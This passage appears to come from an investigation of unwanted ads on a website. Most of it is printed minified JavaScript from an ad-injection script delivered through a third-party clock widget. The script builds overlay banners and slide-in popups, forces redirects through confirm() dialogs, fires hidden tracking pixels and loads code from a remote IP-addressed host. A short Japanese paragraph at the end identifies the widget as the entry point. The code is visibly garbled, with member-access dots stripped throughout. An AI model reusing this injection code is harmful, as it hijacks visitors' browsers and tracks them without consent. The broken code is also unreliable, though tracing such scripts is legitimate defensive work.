g.Ea(b); eK(d); e.na(c) }; this.H(c, a, "bottom", "right"); this.J(c, a); var f = this.$(a.width, a.height), d = "z-index:9999;cursor:pointer;position:fixed;top: " + f.top + "px;left: " + f.left + "px;width: " + a.width + "px;height: " + a.height + "px;"; gv() || (d = d.replace("fixed", "absolute"), this.b(r, "scroll", function () { c.style.top = gq() + f.top + "px" })); c.style.cssText = d; d = k.createElement("span"); d.style.cssText = this.ia.replace("${offsetTop}", "-20"); e = this; d.onclick = function (b) { eK(b); g.ma.call(e, a.trackingDomain + gg(a.closeUri), y, "_blank", ""); e.close(a, c) }; c.appendChild(d) } }; ya.prototype.$ = function (a, b) { return{left: (g.ua() - a) / 2, top: (gk() - b) / 2} }; E(Xa, I); Xa.prototype.p = function (a) { this.t(a); confirm(a.bannerText) && (r.location = a.trackingDomain + gg(a.clickUri)) }; E(Ya, I); Ya.prototype.p = function (a) { r.globalInfo.mredRendered || (r.globalInfo.mredRendered = y, g.log("Rendering m redir"), g.da(a.trackingDomain, a.clickUri)) }; E(da, I); da.prototype.r = ""; da.prototype.p = function (a) { function b(a, b) { a.style.cssText = jI[b]; db(a, "mouseover", function () { a.style.cssText = jP[b]; "text" == b && jo([a]) }, T); db(a, "mouseout", function () { a.style.cssText = jI[b]; jo([a]) }, T) } function c(a, b) { db(a, "mouseover", function () { b.style.cssText = jPsPText; "TD" == a.tagName && jo([b]) }, y); db(a, "mouseout", function () { b.style.cssText = jIsPText; jo([b]) }, y) } this.t(a); var d = this, e = k.createElement("table"), f = k.createElement("tbody"), p = k.createDocumentFragment(), h = k.createElement("img"), j = this, w = s, A; if (!w) { w = {}; w.size = parseInt(a.bannerSize, 10) + 2 * parseInt(a.imgBorderWidth, 10); var q = w.size + parseInt(a.imgMarginSize, 10); switch (a.orientation) { case "over": w.margin = "0"; wC = "0 0 " + a.imgMarginSize + "px"; wm = "none"; wl = "center"; wA = {top: -(a.bannerSizeOnmouseover - a.bannerSize), left: -(a.bannerSizeOnmouseover - a.bannerSize) / 2}; break; case "left": w.margin = "0 0 0 " + q + "px"; wC = "0 -" + q + "px 0 0"; wm = "left"; wl = "left"; wA = {top: -(a.bannerSizeOnmouseover - a.bannerSize) / 2, left: -(a.bannerSizeOnmouseover - a.bannerSize)}; break; case "right": w.margin = "0 " + q + "px 0 0", wC = "0 0 0 -" + q + "px", wm = "right", wl = "left", wA = {top: -(a.bannerSizeOnmouseover - a.bannerSize) / 2, left: 0} } } A = w; var B = gQ() ? "display:inline;zoom:1;" : "display:inline-block;", q = k.getElementById("wzblock" + a.blockId), n = parseInt(a.textSize, 10), m = n + (parseInt(a.textMouseOnTextSize, 10) - parseInt(a.textSize, 10)), l = n + (parseInt(a.textMouseOnTeaserSize, 10) - parseInt(a.textSize, 10)); this.d = parseInt(a.textDivHeight, 10); jI = {table: "table-layout:fixed;background:" + a.background + ";border-collapse:separate;border-spacing:" + a.blockMarginVert + "px " + a.blockMarginHoriz + "px;width:" + a.width + a.widthUnit + ";border:" + a.borderWidth + "px " + a.borderType + " " + a.borderColor + ";", D: "vertical-align:top;background:" + a.cellBackground + ";border:" + a.cellBorderWidth + "px " + a.cellBorderType + " " + a.cellBorderColor + ";cursor:pointer;text-align:" + Al + ";width:" + a.width / a.horizCount + a.widthUnit + ";", u: "z-index:1;margin:" + AC + ";position:relative;" + B + ";height:" + A.size + "px;width:" + A.size + "px;float:" + Am + ";", h: "z-index:1;position:absolute;top:0;left:0;width:" + a.bannerSize + "px;height:" + a.bannerSize + "px;border:" + a.imgBorderWidth + "px " + a.imgBorderType + " " + a.imgBorderColor + ";", text: "margin:" + A.margin + ";cursor:pointer;float:" + Am + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textFontBold ? "700" : "100") + ";font-size:" + n + a.textSizeUnit + ";font-family:" + a.textFont + ";color:" + a.textColor + ";", sPText: "margin:" + A.margin + ";cursor:pointer;float:" + Am + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textFontBold ? "700" : "100") + ";font-size:" + n + a.textSizeUnit + ";font-family:" + a.textFont + ";color:" + a.textColor + ";"}; jP = {table: "table-layout:fixed;background:" + a.backgroundOnmouseover + ";border-collapse:separate;border-spacing:" + a.blockMarginVert + "px " + a.blockMarginHoriz + "px;width:" + a.width + a.widthUnit + ";border:" + a.borderWidth + "px " + a.borderType + " " + a.borderColor + ";", D: "vertical-align:top;background:" + a.cellBackgroundOnmouseover + ";border:" + a.cellBorderWidth + "px " + a.cellBorderType + " " + a.cellBorderColor + ";cursor:pointer;text-align:" + Al + ";width:" + a.width / a.horizCount + a.widthUnit + ";", u: "z-index:5;margin:" + AC + ";position:relative;" + B + ";height:" + A.size + "px;width:" + A.size + "px;float:" + Am + ";", h: "z-index:10;cursor:pointer;position:absolute;top:" + wAtop + "px;left:" + wAleft + "px;height:" + a.bannerSizeOnmouseover + "px;width:" + a.bannerSizeOnmouseover + "px;border:" + a.imgBorderWidth + "px " + a.imgBorderType + " " + a.imgBorderColor + ";", text: "margin:" + A.margin + ";cursor:pointer;float:" + Am + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textMouseOnTextFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textMouseOnTextFontBold ? "700" : "100") + ";font-size:" + m + a.textMouseOnTextSizeUnit + ";font-family:" + a.textMouseOnTextFont + ";color:" + a.textMouseOnTextColor + ";", sPText: "margin:" + A.margin + ";cursor:pointer;float:" + Am + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textMouseOnTeaserFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textMouseOnTeaserFontBold ? "700" : "100") + ";font-size:" + l + a.textMouseOnTeaserSizeUnit + ";font-family:" + a.textMouseOnTeaserFont + ";color:" + a.textMouseOnTeaserColor + ";"}; this.ta = function () { 0 == this.d && (this.d = "over" == a.orientation ? 35 : a.bannerSize) }; if (!q) { q = k.getElementsByTagName("script"); A = RegExp("bid\x3d(" + a.blockId + ")(\\D|.{0}$)"); w = 0; for (B = q.length; w < B; w += 1)if (-1 != q[w].src.indexOf(xarotatorDomain) && A.test(gL(q[w].src)) || -1 != q[w].text.indexOf(xarotatorDomain) && -1 != q[w].text.indexOf(xatrsKey)) { A = k.createElement("div"); A.id = "wzblock" + a.blockId; q[w].parentNode.insertBefore(A, q[w].nextSibling); break } } q = k.getElementById("wzblock" + a.blockId); q.style.display = "block"; r.globalInfo.arrBlocks = []; this.data = a; p.appendChild(e); b(e, "table"); for (w = A = 0; w < a.vertCount; w += 1) { B = k.createElement("tr"); for (n = 0; n < a.horizCount; n += 1) { var m = {D: k.createElement("td"), h: k.createElement("img"), text: k.createElement("span"), u: k.createElement("span")}, l = a.teasers[A], u = k.createElement("span"), t = k.createElement("a"); A++; for (var v in m)b(m[v], v), "td" == v && c(m[v], m.text); var C = l.trackingDomain; mhsrc = xaimgDomain + l.src; mhtitle = this.B(l.title); mhalt = this.B(l.title); mhsetAttribute("clickUri", l.clickUri); gQ() && (mhonclick = function () { r.open(C + gg(this.getAttribute("clickUri") + dG())) }); u.innerHTML = this.B(l.title); m.text.className = "wzTextSpan"; m.text.appendChild(u); r.globalInfo.arrBlocks.push(m.text); muappendChild(mh); t.target = "_blank"; t.href = l.trackingDomain + gg(l.clickUri); t.style.cssText = "text-decoration:none;display:block;"; t.setAttribute("clickUri", l.clickUri); t.onclick = function () { this.href = C + gg(this.getAttribute("clickUri") + dG()) }; t.appendChild(mu); t.appendChild(m.text); mDappendChild(t); B.appendChild(mD) } f.appendChild(B); e.appendChild(f) } h.src = a.teasers[0].impDomain + gg(a.trackShowUri); h.style.cssText = "left:-10000px;top:-10000px;height:1px;width:1px;position:absolute;"; p.appendChild(h); q.appendChild(p); this.o(); if ("px" != this.r.widthUnit) { var E = e.offsetWidth; r.onresize = function () { 10 < Math.abs(E - e.offsetWidth) && (jo(), E = e.offsetWidth) } } }; da.prototype.o = function (a) { if (!this.data.dontResizeFonts) { 0 == parseInt(this.d, 10) && this.ta(); a = a || r.globalInfo.arrBlocks; for (var b = 0, c = a.length; b < c; b += 1)if ("SPAN" == a[b].tagName || "TD" == a[b].tagName) { var d = a[b].getElementsByTagName("span")[0]; if ("undefined" !== typeof d)if (d.offsetHeight > parseInt(this.d, 10))for (; a[b].style.fontSize && d.offsetHeight > parseInt(this.d, 10) && 0 < parseInt(a[b].style.fontSize, 10);)a[b].style.fontSize = parseInt(a[b].style.fontSize, 10) - 1 + this.data.textSizeUnit; else for (; a[b].style.fontSize && d.offsetHeight < parseInt(this.d, 10) && parseInt(a[b].style.fontSize, 10) < parseInt(this.data.textSize, 10);)a[b].style.fontSize = parseInt(a[b].style.fontSize, 10) + 1 + this.data.textSizeUnit } } }; E(ga, da); ga.prototype.p = function (a) { function b() { var a = r.scrollY || j.scrollTop || k.body.scrollTop; m <= a && !n ? (clearInterval(q), q = s, f.style.display = "block", do(), n = setInterval(function () { 0 > parseInt(h.style[B], 10) ? h.style[B] = parseInt(h.style[B], 10) + 20 + "px" : (h.style[B] = "0px", clearInterval(n), n = s) }, 20)) : m > a && !q && c() } function c(b) { clearInterval(n); n = s; q = setInterval(function () { parseInt(h.style[B], 10) > 0 - d.width ? h.style[B] = parseInt(h.style[B], 10) - 20 + "px" : (h.style[B] = 0 - d.width + "px", clearInterval(q), q = s, b ? d.close(a, f) : f.style.display = "none") }, 20) } this.t(a); var d = this, e = "wzScroller" + (new Date).getTime(), f = k.createElement("div"), p = k.createElement("div"), h = k.createElement("div"), j = k.documentElement, m = 200, n, q, B, l = "z-index:10000;overflow:hidden;bottom:0;height:100%;width:100%;background:none;", u = "margin:20px 0 0;position:absolute;top:0;width:100%;height:100%;", t = "position:absolute;width:100%;height:20px;top:-20px;"; this.r = a; switch (a.bannerPosition) { case 6: B = "left"; l += "left: 0;"; u += "padding:0 30px 5px 5px;background:url(" + xascriptsDomain + "img/bottom_l.png) no-repeat 100% bottom;"; t += "right:0;background:url(" + xascriptsDomain + "img/top_l.png) no-repeat 100% 0;"; break; default: B = "right", l += "right: 0;", u += "padding:0 5px 5px 30px;background:url(" + xascriptsDomain + "img/bottom_r.png) no-repeat 0 bottom;", t += "left:0;background:url(" + xascriptsDomain + "img/top_r.png) no-repeat 0 0;" } this.height = this.width = 0; h.innerHTML = '\x3cspan style\x3d"float: left;font: bold 14px Arial; color: #701C1F;"\x3e\u0427\u0418\u0422\u0410\u0419\u0422\u0415 \u0422\u0410\u041a\u0416\u0415\x3c/span\x3e\x3cspan style\x3d"float: right; font: 12px/16px Arial; color:#666;cursor: pointer;" id\x3d"close_' + e + '"\x3e\u0417\u0430\u043a\u0440\u044b\u0442\u044c\x3c/span\x3e\x3cdiv style\x3d"clear: both;"\x3e\x3c/div\x3e'; h.appendChild(p); p.style.cssText = t; h.style.cssText = u; h.id = e; gv() ? l += "position:fixed;" : (l += "position:absolute;", g.aa({F: f}), this.b(r, "scroll", function () { g.aa({F: f}) }, T)); f.style.cssText = l; f.appendChild(h); this.H(h, a); k.body.appendChild(f); f.style.width = a.width + a.widthUnit; l = f.offsetWidth - 35; h.style.width = 790 > l ? l + "px" : "755px"; this.sa(a, e); f.style.width = this.width + 35 + "px"; h.style[B] = "-" + this.width + "px"; h.style.width = this.width + "px"; f.style.height = this.height + 70 + "px"; h.style.height = this.height + 45 + "px"; p.style.width = f.style.width; f.style.display = "none"; this.b(r, "scroll", function () { b() }, T); this.b(r, "resize", function () { b() }, T); k.getElementById("close_" + e).onclick = function () { c(y) }; this.wrap = f; this.data = a; this.id = e; return this }; ga.prototype.sa = function (a, b) { function c(a, b) { a.style.cssText = nI[b]; eb(a, "mouseover", function () { a.style.cssText = nP[b]; "text" == b && no([a]) }, T); eb(a, "mouseout", function () { a.style.cssText = nI[b]; no([a]) }, T) } function d(a, b) { eb(a, "mouseover", function () { b.style.cssText = nPsPText; "TD" == a.tagName && no([b]) }, y); eb(a, "mouseout", function () { b.style.cssText = nIsPText; no([b]) }, y) } var e = this, f = k.createElement("table"), p = k.getElementById(b), h = k.createElement("tbody"), j = k.createDocumentFragment(), m = k.createElement("img"), n = this, q = s, l; if (!q)switch (q = {}, q.size = parseInt(a.bannerSize, 10) + 2 * parseInt(a.imgBorderWidth, 10), l = q.size + parseInt(a.imgMarginSize, 10), a.orientation) { case "over": q.margin = "0"; qC = "0 0 " + a.imgMarginSize + "px"; qm = "none"; ql = "center"; qA = {top: -(a.bannerSizeOnmouseover - a.bannerSize), left: -(a.bannerSizeOnmouseover - a.bannerSize) / 2}; break; case "left": q.margin = "0 0 0 " + l + "px"; qC = "0 -" + l + "px 0 0"; qm = "left"; ql = "left"; qA = {top: -(a.bannerSizeOnmouseover - a.bannerSize) / 2, left: -(a.bannerSizeOnmouseover - a.bannerSize)}; break; case "right": q.margin = "0 " + l + "px 0 0", qC = "0 0 0 -" + l + "px", qm = "right", ql = "left", qA = {top: -(a.bannerSizeOnmouseover - a.bannerSize) / 2, left: 0} } l = q; var u = gQ() ? "display:inline;zoom:1;" : "display:inline-block;", t = parseInt(a.textSize, 10), v = t + (parseInt(a.textMouseOnTextSize, 10) - parseInt(a.textSize, 10)), C = t + (parseInt(a.textMouseOnTeaserSize, 10) - parseInt(a.textSize, 10)); this.d = parseInt(a.textDivHeight, 10); this.I = {table: "margin:5px 0;table-layout:fixed;background:" + a.background + ";border-collapse:separate;border-spacing:" + a.blockMarginVert + "px " + a.blockMarginHoriz + "px;width:100%;border:" + a.borderWidth + "px " + a.borderType + " " + a.borderColor, D: "vertical-align:top;background:" + a.cellBackground + ";border:" + a.cellBorderWidth + "px " + a.cellBorderType + " " + a.cellBorderColor + ";cursor:pointer;text-align:" + ll + ";width:" + 100 / a.horizCount + "%", u: "z-index:1;margin:" + lC + ";position:relative;" + u + ";height:" + l.size + "px;width:" + l.size + "px;float:" + lm, h: "position:absolute;top:0;left:0;width:" + a.bannerSize + "px;height:" + a.bannerSize + "px;border:" + a.imgBorderWidth + "px " + a.imgBorderType + " " + a.imgBorderColor, text: "margin:" + l.margin + ";cursor:pointer;float:" + ll + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textFontBold ? "700" : "100") + ";font-size:" + t + a.textSizeUnit + ";font-family:" + a.textFont + ";color:" + a.textColor, sPText: "margin:" + l.margin + ";cursor:pointer;float:" + ll + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textFontBold ? "700" : "100") + ";font-size:" + t + a.textSizeUnit + ";font-family:" + a.textFont + ";color:" + a.textColor}; this.P = {table: "margin:5px 0;table-layout:fixed;background:" + a.backgroundOnmouseover + ";border-collapse:separate;border-spacing:" + a.blockMarginVert + "px " + a.blockMarginHoriz + "px;width:100%;border:" + a.borderWidth + "px " + a.borderType + " " + a.borderColor, D: "vertical-align:top;background:" + a.cellBackgroundOnmouseover + ";border:" + a.cellBorderWidth + "px " + a.cellBorderType + " " + a.cellBorderColor + ";cursor:pointer;text-align:" + ll + ";width:" + 100 / a.horizCount + "%", u: "z-index:5;margin:" + lC + ";position:relative;" + u + ";height:" + l.size + "px;width:" + l.size + "px;float:" + lm, h: "position:absolute;cursor:pointer;top:" + qAtop + "px;left:" + qAleft + "px;height:" + a.bannerSizeOnmouseover + "px;width:" + a.bannerSizeOnmouseover + "px;border:" + a.imgBorderWidth + "px " + a.imgBorderType + " " + a.imgBorderColor, text: "margin:" + l.margin + ";cursor:pointer;float:" + ll + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textMouseOnTextFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textMouseOnTextFontBold ? "700" : "100") + ";font-size:" + v + a.textMouseOnTextSizeUnit + ";font-family:" + a.textMouseOnTextFont + ";color:" + a.textMouseOnTextColor, sPText: "margin:" + l.margin + ";cursor:pointer;float:" + ll + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textMouseOnTeaserFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textMouseOnTeaserFontBold ? "700" : "100") + ";font-size:" + C + a.textMouseOnTeaserSizeUnit + ";font-family:" + a.textMouseOnTeaserFont + ";color:" + a.textMouseOnTeaserColor}; this.ta = function () { 0 == this.d && (this.d = "over" == a.orientation ? 35 : a.bannerSize) }; r.globalInfo.arrBlocks = []; this.data = a; j.appendChild(f); c(f, "table"); for (l = q = 0; l < a.vertCount; l += 1) { u = k.createElement("tr"); for (t = 0; t < a.horizCount; t += 1) { var v = {D: k.createElement("td"), h: k.createElement("img"), text: k.createElement("span"), u: k.createElement("span")}, C = a.teasers[q], E = k.createElement("span"), D = k.createElement("a"); q++; for (var G in v)c(v[G], G), "td" == G && d(v[G], v.text); var H = C.trackingDomain; vhsrc = xaimgDomain + C.src; vhtitle = eB(C.title); vhalt = eB(C.title); vhsetAttribute("clickUri", C.clickUri); gQ() && (vhonclick = function () { this.href = H + gg(this.getAttribute("clickUri") + eG()) }); E.innerHTML = eB(C.title); v.text.className = "wzTextSpan"; v.text.appendChild(E); r.globalInfo.arrBlocks.push(v.text); vuclassName = "wzImgSpan"; vuappendChild(vh); D.target = "_blank"; D.href = C.trackingDomain + gg(C.clickUri); D.style.cssText = "text-decoration:none;display:block;"; D.setAttribute("clickUri", C.clickUri); D.onclick = function () { this.href = H + gg(this.getAttribute("clickUri") + e) }; D.appendChild(vu); D.appendChild(v.text); vDappendChild(D); u.appendChild(vD) } h.appendChild(u); f.appendChild(h) } m.src = a.teasers[0].impDomain + gg(a.trackShowUri); m.style.cssText = this.U; j.appendChild(m); p.appendChild(j); this.height = f.offsetHeight; this.width = f.offsetWidth; if ("px" != this.data.widthUnit) { var I = f.offsetWidth; r.onresize = function () { 10 < Math.abs(I - f.offsetWidth) && (no(), width = I = f.offsetWidth) } } }; E(Za, ga); Za.prototype.p = function (a) { var b = this, c = "wzPopin" + (new Date).getTime(), d = document.createElement("div"), e = document.createElement("div"), f = document.createElement("span"), k, h, j = "z-index:9999;overflow:hidden;height:0;width:100%;background:none;", l = "background:#fff;position:absolute;", m = "100" == a.height && "%" == a.heightUnit; if (m)switch (a.bannerPosition) { case 0: case 6: a.bannerPosition = 3; break; case 2: case 8: a.bannerPosition = 5 } switch (a.bannerPosition) { case 0: k = "bottom"; j += "top:0;left:0;"; l += "margin: 0 0 20px;bottom:0;left:0;right:0;"; h = "bottom"; break; case 2: k = "bottom"; j += "top:0;right:0;"; l += "margin: 0 0 20px;bottom:0;left:0;"; h = "bottom"; break; case 3: k = "right"; j += "top:0;left:0;"; l += "margin: 20px 0 0;bottom:0;top:0;right:0;"; h = "top"; break; case 5: k = "left"; j += "top:0;right:0;"; l += "margin: 20px 0 0;bottom:0;top:0;left:0;right:0;"; h = "top"; break; case 6: k = "top"; j += "bottom:0;left:0;"; l += "margin: 20px 0 0;top:0;left:0;right:0;"; h = "top"; break; default: k = "top", j += "bottom:0;right:0;", l += "margin: 20px 0 0;bottom:0;top:0;left:0;right:0;", h = "top" } this.width = this.height = 0; e.style.cssText = l; e.id = c; gv() ? j += "position:fixed;" : (j += "position:absolute;", g.aa({F: d}), r.onscroll = function () { g.aa({F: d}) }); d.style.cssText = j; d.appendChild(e); f.style.cssText = "position: absolute; " + h + ": -17px; right: 10px;font: 12px/17px Arial; color:#666;cursor: pointer;"; f.innerHTML = "\u0417\u0430\u043a\u0440\u044b\u0442\u044c"; setTimeout(function () { e.appendChild(f) }, 5E3); this.H(e, a); document.body.appendChild(d); d.style.width = a.width + a.widthUnit; e.style.width = d.offsetWidth - 0 + "px"; this.sa(a, c); m ? (d.style.height = "100%", e.style[k] = d.offsetWidth + "px", e.style.height = "100%") : (d.style.height = this.height + 20 + "px", e.style[k] = d.style.height, e.style.height = this.height + "px"); e.style.width = this.width + "px"; this.o(); f.onclick = function () { b.close(a, d) }; setTimeout(function () { var a = setInterval(function () { 0 < parseInt(e.style[k], 10) ? e.style[k] = parseInt(e.style[k], 10) - 10 + "px" : (e.style[k] = 0, clearInterval(a)) }, 20) }, 1E3); this.wrap = d; this.data = a; this.id = c; return this }; var Eb = new xa, Fb = new Ta, Gb = new Ua, Hb = new Va, Ib = new ca, Jb = new Wa, Kb = new ya, Lb = new Xa, Mb = new da, Nb = new ga, Ob = new Za, Pb = new Ya, g = new sb, x = new rb(xb) })(window, document, "eyJ2ZXJzaW9ucyI6eyJtcm90IjoiMTM4MTQ3OTUxMzA5NSIsImRpcmVjdCI6IjEzODE0Nzk1MTMwOTUiLCJzY3IiOiIxLzIyLmpzPzI0Iiwicm90IjoiMS8zLmpzPzI0IiwidGwiOiIxLzEyLmpzPzI0IiwiY29tbW9uIjoiMS8xLmpzPzI0IiwibXBwdW5kIjoiMTM4MTQ3OTUxMzA5NSIsImFzIjoiMS8yLmpzPzI0IiwiaWNxIjoiMTM4MTQ3OTUxMzA5NSIsImJyIjoiMS8xMS5qcz8yNCIsInZrbSI6IjEvMjEuanM_MjQiLCJ0c3IiOiIxLzE4LmpzPzI0IiwicGQiOiIxMzgxNDc5NTEzMDk1IiwicHB1bmQiOiIxMzgxNDc5NTEzMDk1Iiwic2dtIjoiMTM4MTQ3OTUxMzA5NSIsInBpbiI6IjEvMjMuanM_MjQiLCJqc2ZyIjoiMTM4MTQ3OTUxMzA5NSIsInBvcHVwIjoiMS80LmpzPzI0IiwibWRpcmVjdCI6IjEzODE0Nzk1MTMwOTUiLCJmciI6IjEzODE0Nzk1MTMwOTUiLCJ3YmwiOiIxMzgxNDc5NTEzMDk1IiwiZW0iOiIxMzgxNDc5NTEzMDk1IiwiY2YiOiIxLzE1LmpzPzI0In0sInNjcmlwdHNEb21haW4iOiJodHRwOi8vMTg4LjY0LjE3NC4yNS9qcy8iLCJydFVyaSI6Ii8_");
x = new rb(xb);
function rb(a) { this.a = g.parseJSON(gL(a)); r.globalInfo = {}; g.log(this.a); if (this.a.ukDomain && this.a.ukUri && !r.udata && !this.a.dontGoToUK) { var b = this, c = setTimeout(function () { b.oa() }, 5E3); g.da(this.a.ukDomain, this.a.ukUri, function (a) { clearTimeout(c); g.parseJSON(gL(a)); r.globalInfo.udata = a; b.oa() }, "jsf") } else this.a.foreignUid || this.Ba(this.a.matchingUrl), this.oa() }
L: function (a, b) { a = a.replace(/[\-]/g, "+").replace(/[_]/g, "/"); for (var c = [-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, 0, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1], d, e, f = 0, g = [], h = 0, j = 0, f = 0; f < a.length; f++)e = a.charCodeAt(f), d = c[e & 127], -1 === d ? this.log("Illegal characters (code\x3d" + e + ") in position " + f) : (j = j << 6 | d, h += 6, 8 <= h && (h -= 8, "\x3d" !== a.charAt(f) && g.push(j >> h & 255), j &= (1 << h) - 1)); if (b) { c = []; b &= 255; for (d = 0; d < g.length; c.push(b ^ g[d]), d++); g = c } return this.lb(g)
lb: function (a) { for (var b = [], c = 0, d = a.length, e, f, g; c < d;)e = a[c], f = a[c + 1], g = a[c + 2], 128 > e ? (b.push(String.fromCharCode(e)), c += 1) : 191 < e && 224 > e ? (b.push(String.fromCharCode((e & 31) << 6 | f & 63)), c += 2) : (b.push(String.fromCharCode((e & 15) << 12 | (f & 63) << 6 | g & 63)), c += 3); return b.join("")
x = new rb(xb)
x = new rb(xb); console.debug(x);
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サーバーからのリクエストを長時間分析した結果、「容疑者」は2人しかいないという結論に達しました-これはyandexメトリック(はい、考えました)と、最初は気づかなかった1つのウィジェット-101widgetsのウィジェットです。 com。私はすぐにこの時計を取り外して、広告が再び表示されるかどうかの結果を確認するよう求めました。時計の有無にかかわらず、アノニマイザーなどを介して数十のサンプルを実行した後パターンが明らかになりました-時計はスクリプトをダウンロードするためのEntryPointであり、スクリプトは既に広告バナーを作成しています。